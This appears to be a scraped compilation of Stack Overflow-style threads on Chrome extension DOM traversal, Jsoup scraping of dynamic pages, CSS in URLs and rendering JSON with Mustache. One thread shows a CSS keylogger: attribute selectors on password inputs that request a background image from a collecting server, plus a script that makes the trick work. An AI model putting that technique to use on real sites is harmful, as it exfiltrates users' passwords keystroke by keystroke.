Chrome Extension: DOM traversal - google-chrome

I want to write a Chrome extension that looks at the HTML of the page its on, and if it finds eg <div id="hello"> then it will output, as a HTML list in the popup, 'This page has a friendly div' and if it finds eg I am married to a banana then it will output 'This guy is weird.'
So in other words, searching for specific stuff in the DOM and outputting messages in the popup depending on what it finds.
I had a look at Google Chrome Extension - Accessing The DOM for accessing the dom but I'm afraid I don't really understand it. Then of course there will be traversing the dom and presumably using regex and then conditional statements.

Well that stackoverflow question asked how to let your extension talk to the DOM. There are numerous ways, one way is through chrome.tabs.executeScript, and another way is through Message Passing as I explained in that question.
Back to your question, you could use XPath to search within the DOM. It is pretty powerful. For example you said you want to search for <div id="hello">, you can do it like this:
var nodes = document.evaluate("//div[#id='hello']", document, null,
XPathResult.ANY_TYPE, null)
var resultNode = nodes.iterateNext()
if (resultNode) {
// Found the first node. Output its contents.
alert(resultNode.innerHTML);
}
Now for your second example, same thing ..
I am married to a banana
var nodes = document.evaluate("//a[#href='http://bananas.com']/text()[contains(.,'married')]",
document, null,
XPathResult.ANY_TYPE, null)
var resultNode = nodes.iterateNext()
if (resultNode) {
// Found the first node. Output its contents.
alert('This guy is weird');
}
Well you could use XPath which does work perfectly in Chrome, and you can make your query simple such as finding nodes that you want or even complex with detail. You can query any node, and then do post processing if you wish as well.
Hope that helped. Remember all this should be within a content script in the Chrome Extension. And if you want your extension to communicate to that, you can use Message Passing as I explained in the other post. So basically, within your popup.html, you send a request to the content script to find you text. Your content script will send back a response from its callback. To send the request, you should use chrome.tabs.sendRequest and within the content script.You listen for that request and handle it. As I explained in the other stackoverflow question.

Do NOT use regular expressions to parse HTML. The <center> cannot hold.
With that out of the way... although you can use XPath, I think querySelector is similar in power while being somewhat simpler as well.
You simply pass a CSS selector as a string, and it returns the elements that match the selector. Kinda like using jQuery without needing to load the jQuery library.
Here's how you would use it:
var query = document.querySelector("div#hello");
if (query) {
alert("This page has a friendly div");
}
var query = document.querySelectorAll("a[href='http://bananas.com']");
for (var i = 0; i < query.length; i += 1) {
if (query[i].textContent === "I am married to a banana") {
alert("This guy is weird.");
return;
}
}
document.querySelector finds only a single element, and returns null if that element is not found.
document.querySelectorAll returns a fake-array of elements, or an empty fake-array if none are found.
...however, it sounds like you're wanting to update the browser action popup when something is detected in a webpage, correct? If so, that is possible but immensely more difficult.
Mohamed Mansour's post will get you to the point where you can communicate between content scripts and the background page/popup, but there are other bits that need to be done as well.

Unless the problem is more complex than I think, why not just use jQuery or other convenient js api for this? This is what they were made for - to traverse the dom easily. You can inject jquery and your script that will be using it into required pages in manifest:
"content_scripts": [ {
"js": [ "jquery.js", "script.js" ],
"matches": [ "http://*/*", "https://*/*" ]
}]

Related

How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
inp.setAttribute('value', inp.value)
});
Is what I've found but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet won't work as typing in the input field will not change the value attribute of the html element. A JavaScript function is required to do this. Hence, include the last 3 lines of your snippet in a script tag and then it should work.
The CSS Keylogger was originally a thought experiment as explained in this LiveOverflow video. The snippet you are using is assuming that http://localhost:3000/ is a malicious Web server which records your HTTP requests.
In this case entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (for fetching the background image) which you may intercept as "a" on the Web server. You may write a NodeJS or Python Web server to intercept these requests and get the keystrokes.

Jsoup - hidden div class?

Im trying to scrape a div class but everything I have tried has failed so far :(
Im trying to scrape the element(s):
<a href="http://www.bellator.com/events/d306b5/bellator-newcastle-pitbull-vs-
scope"><div class="s_buttons_button s_buttons_buttonAlt
s_buttons_buttonSlashBack">More info</div></a>
from the website: http://www.bellator.com/events
I tried accessing the list of elements by doing
Elements elements = document.select("div[class=s_container] > li");
but that didnt return anything.
Then i tried accessing just the parent with
Elements elements = document.select("div[class=s_container]");
and that returned two div with classname "s_container", non of which is the one I needed :<
then i tried accessing that ones parent with
Elements elements = document.select("div[class=ent_m152_bellator module
ent_m152_bellator_V1_1_0 ent_m152]");
And that didnt return anything
I also tried
Elements elements = document.select("div[class=ent_m152_bellator]");
because I wasnt sure about the white spaces but it didnt return anything either
Then I tried accessing its parent by
Elements elements = document.select("div#t3_lc");
and that worked, but it returned an element containing
<div id="t3_lc">
<div class="triforce-module" id="t3_lc_promo1"></div>
</div>
which is kinda weird because i cant see that it has that child when i inspect the website in chrome :S
Anyone knows whats going on? I feel kinda lost..
What you see in your web browser is not what Jsoup sees. Disable JavaScript and refresh page to get what Jsoup gets OR press CTRL+U ("Show source", not "Inspect"!) in your browser to see original HTML document before JavaScript modifications. When you use your browser's debugger it shows final document after modifications so it's not not suitable for your needs.
It seems like whole "UPCOMING EVENTS" section is dynamically loaded by JavaScript.
Even more, this section is asynchronously loaded with AJAX. You can use your browsers debugger (Network tab) to see every possible request and response.
I found it but unfortunately all the data you need is returned as JSON so you're going to need another library to parse JSON.
That's not the end of the bad news and this case is more complicated. You could make direct request for the data:
http://www.bellator.com/feeds/ent_m152_bellator/V1_1_0/d10a728c-547e-4a6f-b140-7eecb67cff6b
but the URL seems random and few of these URLs (one per upcoming event?) are included inside JavaScript code in HTML.
My approach would be to get the URLs of these feeds with something like:
List<String> feedUrls = new ArrayList<>();
//select all the scripts
Elements scripts = document.select("script");
for(Element script: scripts){
if(script.text().contains("http://www.bellator.com/feeds/")){
// here use regexp to get all URLs from script.text() and add them to feedUrls
}
}
for(String feedUrl : feedUrls){
// iterate over feed URLs, download each of them
String json = Jsoup.connect(feedUrl).ignoreContentType(true).get().body().toString();
// here use JSON parsing library to get the data you need
}
ALTERNATIVE approach would be to stop using Jsoup because of its limitations and use Selenium Webdriver as it supports dynamic page modifications by JavaScript so you'd get the HTML of the final result - exactly what you see in web browser and Inspector.
If anyone finds this in the future; I managed to solve it with Selenium, dont know if its a good/correct solution but it seems to be working.
System.setProperty("webdriver.chrome.driver", "C:\\Users\\PC\\Desktop\\Chromedriver\\chromedriver.exe");
WebDriver driver = new ChromeDriver();
driver.get("http://www.bellator.com/events");
String html = driver.getPageSource();
Document doc = Jsoup.parse(html);
Elements elements = doc.select("ul.s_layouts_lineListAlt > li > a");
for(Element element : elements) {
System.out.println(element.attr("href"));
}
Output:
http://www.bellator.com/events/d306b5/bellator-newcastle-pitbull-vs-scope
http://www.bellator.com/events/ylcu8d/bellator-215-mitrione-vs-kharitonov
http://www.bellator.com/events/yk2djw/bellator-216-mvp-vs-daley
http://www.bellator.com/events/e8rdqs/bellator-217-gallagher-vs-graham
http://www.bellator.com/events/281wxq/bellator-218-sanchez-vs-grimshaw
http://www.bellator.com/events/8lcbdi/bellator-219-koreshkov-vs-larkin
http://www.bellator.com/events/9rqguc/bellator-macdonald-vs-fitch

Get innerHTML via Jsoup

Im trying to scrape data from this website: http://www.bundesliga.de/de/liga/tabelle/
In the source code i can see the tables but there's no content, just things like:
<td>[no content]</td>
<td>[no content]</td>
<td>[no content]</td>
<td>[no content]</td>
....
With firebug (F12 in Firefox) i wont see any content too but i can select the table and then copy the innerHTML via firebug option. In that case i get all the informations about the teams, but i dont know how to get the table with the content in Jsoup.
To get the value of an attribute, use the Node.attr(String key) method
For the text on an element (and its combined children), use Element.text()
For HTML, use Element.html(), or Node.outerHtml() as appropriate
For example:
String html = "<p>An <a href='http://example.com/'><b>example</b></a> link.</p>";
Document doc = Jsoup.parse(html);
Element link = doc.select("a").first();
String text = doc.body().text(); // "An example link"
String linkHref = link.attr("href"); // "http://example.com/"
String linkText = link.text(); // "example""
String linkOuterH = link.outerHtml();
// "<b>example</b>"
String linkInnerH = link.html(); // "<b>example</b>"
reference:
http://jsoup.org/cookbook/extracting-data/attributes-text-html
The table is not rendered on the server directly, but build by the client side JavaScript of the page and constructed with data that is getting to the client via AJAX. So what you get with the naive Jsoup approach is expected.
I see two possible solutions:
You analyze the network traffic and identify the ajax calls that the site is making. Then you try to reconstruct the format and fire the same requests as the JavaScript would. Then you can reconstruct the table.
you don't use Jsoup but a real browser, that loads the page and runs the JavaScript including all AJAX calls. You could use Selenium webdriver for that. There is a headless browser called phantomjs which has a relatively small footprint that you can use in combination with selenium webdriver.
both options have their (dis)advantages:
This takes more time, since you need to understand the network traffic pretty good. The reward will be a very fast and memory efficient scraper.
The programming of selenium is very easy and you should not have any difficulties achieving your goal. You don't need to understand the inner workings of the site you want to scrape. However, the price is a further dependency in your project. Memory consumption is high. Another process runs. The scraping will be slow.
Maybe you find another source with the soccer table that is holding the infos you want? That might be the easiest. For example http://www.fussballdaten.de/bundesliga/

Is it possible to add CSS code to URL?

after one hour of browsing I decided to ask this question here.
Is it possible to add css code to an url, for example to change the background color?
Someting kike this: http://yahoo.com (command)style=background-color:#000000;
or similar. Or is it possible to create an url where the site loads with a modified css without using a Chrome extension or similar?
Thanks for help!
No. You can't (using standard software) modify a document by adding anything to that document's URL (unless the server recognises the addition to the URL (e.g. if it was a query string) and returns a different document based on it).
If it was possible then browsers would be exposing every site to XSS attacks.
A browser extension would be the only way to do this client side (but would render users of that extension vulnerable to XSS attacks).
You could also use a bookmarklet in a two stage approach (1. Visit page. 2. Click to activate bookmarket.).
it's possible in a way, but probably not how you imagined it (see Quentin's answer to understand why).
with javascript - note that this is not a 'native' feature so you will have to do a little walk-around. look at the following example:
function get_query_param(name) {
name = name.replace(/[\[]/, "\\\[").replace(/[\]]/, "\\\]");
var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"),
results = regex.exec(location.search);
return results == null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
}
window.onload = function() {
var bgcolor = get_query_param('bgcolor');
if (bgcolor.length) {
document.getElementById("xyz").style["padding-top"] = "10px";
document.body.style.backgroundColor = bgcolor;
}
}
now try browsing your page with ?bgcolor=red at the end of the url.
of course that's a demonstration of the main idea, you will have to implement each css property you wish to modify using this approach.
hope that helps.
Yes it is possible. Follow this:
Yahoo
is it possible to create an url where the site loads with a modified css
Solution:
Add something like this : ?v=1.1
<link rel="stylesheet" href="style.css?v=1.1">
When you change the css change the version like this: ?v=1.2 after then your browser will load newly updated css. Note that you can replace to any number each time you change the css.
This will have no effect on the CSS. It will only serve to make the browser think it’s a completely different file.
If you don’t change the value for a while, the browser will continue to cache (or preserve) the file, and won’t attempt to download it unless other factors force it to, or you end up updating the query string value.

Animating JSON data?

Dumb question time. I was trying to integrate my JSON data with a flipbook plugin, using a Mustache templating system. Needless to say, this wasn't working at all.
I'm a jQuery noobie, so is there any easy way to bind and animate the JSON data to/with a plugin (with or without the Mustache tags)??
From your question it is a bit hard to deduce what you want, but I feel you got already all the pieces together. First the example you have been linking to in a comment: https://github.com/blasten/turn.js/wiki/Making-pages-dynamically-with-Ajax
This fetches not yet loaded pages via Ajax, and the sample code assumes the Ajax call gets HTML back from the server, as can be seen in the code snippet from there (after adding a missing '}':
$.ajax({url: "app?method=get-page-content&page="+page})
.done(function(data) {
element.html(data);
});
Here the done function processes the data it got back from the server by straight injecting it into the element, which is expected to contain the current page.
I assume next that you do have a server side method, but that method returns JSON instead. Let me assume for the moment that it returns the following structure:
{ "title" : "the title of page N",
"text" : "here is some text for the page N." }
The next thing is to render this JSON into into html in the done funktion, before inserting the result into the page. Looking at the short tutorial on the README.md this might look like:
$.ajax({url: "app?method=get-page-content&page="+page})
.done(function(data) {
var pageHtml = Mustache.render("<h2>{{title}}</h2><p>{{text}}</p>", data);
element.html(pageHtml);
});
If the server returns the proper data you should now see a
<h2>the title of page N</h2><p>here is some text for the page N.</p>
appear on the page.